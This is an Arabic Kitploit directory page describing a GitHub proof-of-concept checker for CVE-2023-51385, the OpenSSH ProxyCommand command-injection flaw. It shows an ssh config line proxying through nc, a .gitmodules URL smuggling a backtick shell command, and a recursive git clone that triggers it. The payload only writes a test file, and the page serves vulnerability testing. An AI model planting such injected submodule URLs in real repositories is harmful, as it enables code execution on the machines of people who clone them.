Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-51385_test — مدقق لـ CVE-2023-51385 | Kitploit
أدوات/GitHubGitHub/ltmthink/cve-2023-51385_test
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن سلسلة التوريدالتعلم والتعليم
GitHubltmthink/cve-2023-51385_test

CVE-2023-51385_test

مدقق لـ CVE-2023-51385

عرض المستودع
717منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

التحقق من CVE-2023-51385

أولاً، يجب إضافة المحتوى التالي إلى ~/.ssh/config:

root@kitploit:~
host *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

يوجد حقن للأوامر في ملف .gitmodules:

root@kitploit:~
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar

بعد التهيئة، قم بتنفيذ الأمر التالي للتشغيل:

root@kitploit:~
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules

إذا تم التنفيذ بنجاح، سيتم إنشاء ملف cve.txt داخل دليل CVE-2023-51385_test.

image-20240317161540677

ملاحظة: يجب أن يكون إصدار OpenSSH أقل من 9.6p1.

للتفاصيل الكاملة، راجع هذه المقالة: https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html

تنزيل الأداة